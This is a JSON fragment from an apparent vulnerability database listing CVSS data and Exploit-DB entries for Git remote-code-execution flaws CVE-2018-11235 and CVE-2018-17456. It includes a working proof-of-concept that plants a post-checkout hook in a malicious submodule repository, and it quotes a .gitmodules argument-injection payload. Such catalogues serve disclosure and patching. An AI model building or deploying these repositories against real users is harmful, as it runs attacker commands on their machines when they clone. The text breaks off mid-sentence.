"AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-06-22T17:15:23", "id": "CESA-2018:1957", "href": "https://lists.centos.org/pipermail/centos-announce/2018-June/059843.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2018-06-01T18:11:28", "description": "Git < 2.17.1 - Remote Code Execution. CVE-2018-11235. Remote exploit for Linux platform", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-01T00:00:00", "type": "exploitdb", "title": "Git < 2.17.1 - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-06-01T00:00:00", "id": "EDB-ID:44822", "href": "https://www.exploit-db.com/exploits/44822/", "sourceData": "# Exploit Title: Git (code execution)\r\n# Date: 2018-05-29\r\n# Exploit Author: JameelNabbo\r\n# Website: jameelnabbo.com <http://jameelnabbo.com/>\r\n# Vendor Homepage: https://github.com/git/git <https://github.com/git/git>\r\n# CVE: CVE-2018-11235\r\n #Version: <=2.17.1 \r\n# Tested on Kali Linux\r\n\r\n\r\nP0C:\r\n\r\nCreate two files:\r\npwned.sh: the file which will contain our commands to be executed \r\ncommit.sh the fole which contain a normal build with a bit of calls to our pwned.sh file\r\n\r\nadd the follwing to Pwned.sh:\r\n#!/bin/sh\r\ncat << EOF\r\n\r\n#here we can put our lovely commands\r\nExploited! : $(ifconfig)\r\n\r\nEOF\r\n\r\n#--------\r\n\r\nAdd the follwing to commit.sh file:\r\n#!/bin/sh\r\n\r\nset -e\r\n\r\nrepo_dir=\"$PWD/repo\"\r\n#change it to any other Repo\r\nrepo_submodule='https://github.com/JameelNabbo/SmartWorm'\r\n\r\ngit init \"$repo_dir\"\r\ncd \"$repo_dir\"\r\ngit submodule add \"$repo_submodule\" pwned\r\nmkdir modules\r\ncp -r .git/modules/pwned modules\r\ncp ../pwned.sh modules/pwned/hooks/post-checkout\r\ngit config -f .gitmodules submodule.pwned.update checkout\r\ngit config -f .gitmodules --rename-section submodule.pwned submodule.../../modules/pwned\r\ngit add modules\r\ngit submodule add \"$repo_submodule\"\r\ngit add SmartWorm\r\ngit commit -am pwned\r\necho \"All done, now \\`git clone --recurse-submodules \\\"$repo_dir\\\" dest_dir\\`\u201d\r\n\r\n\r\n\u2014\u2014\u2014\u2014\u2014\u2014\r\nSolution:\r\nhttps://www.edwardthomson.com/blog/upgrading_git_for_cve2018_11235.html", "sourceHref": "https://www.exploit-db.com/download/44822/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-13T05:34:45", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-16T00:00:00", "type": "exploitdb", "title": "Git Submodule - Arbitrary Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235", "CVE-2018-17456", "2018-17456"], "modified": "2018-10-16T00:00:00", "id": "EDB-ID:45631", "href": "https://www.exploit-db.com/exploits/45631", "sourceData": "# CVE-2018-17456\r\n\r\nI've gotten a couple of questions about exploitation for the\r\n[recent RCE](https://marc.info/?l=git&m=153875888916397&w=2) in Git. So here we\r\ngo with some technical details.\r\n\r\n## TL;DR\r\n\r\n[Here](https://github.com/joernchen/poc-submodule) is a PoC repository.\r\nEDB Note: Mirror ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45631.zip\r\n\r\n## Exploitation\r\n\r\nThe `.gitmodules` file looks as follows:\r\n\r\n```\r\n[submodule \"x:x\"]\r\n\tpath = x:x\r\n\turl = -u./payload\r\n```\r\n\r\nThe actual command being injected is set by the url, `-u./payload`\r\npoints the `upload-pack` flag of git clone to the `payload` shell\r\nscript. Note also the `:` within the path, this part is needed to\r\nactually get the `payload` script executed.\r\n\r\nThe path will end up as the repository URL in the subsequent `clone`\r\noperation:\r\n\r\n```\r\nexecve(\"/usr/lib/git-core/git\", [\"/usr/lib/git-core/git\", \"clone\",\r\n\"--no-checkout\", \"--progress\", \"--separate-git-dir\",\r\n\"/tmp/huhu/.git/modules/x:x\", \"-u./payload\", \"/tmp/huhu/x:x\"],...\r\n```\r\n\r\nAs the actual URL from `.gitmodules` is interpreted as the `-u`\r\nargument.\r\n\r\nThe colon
[SECURITY] Fedora 27 Update: libgit2-0.26.6-1.fc27
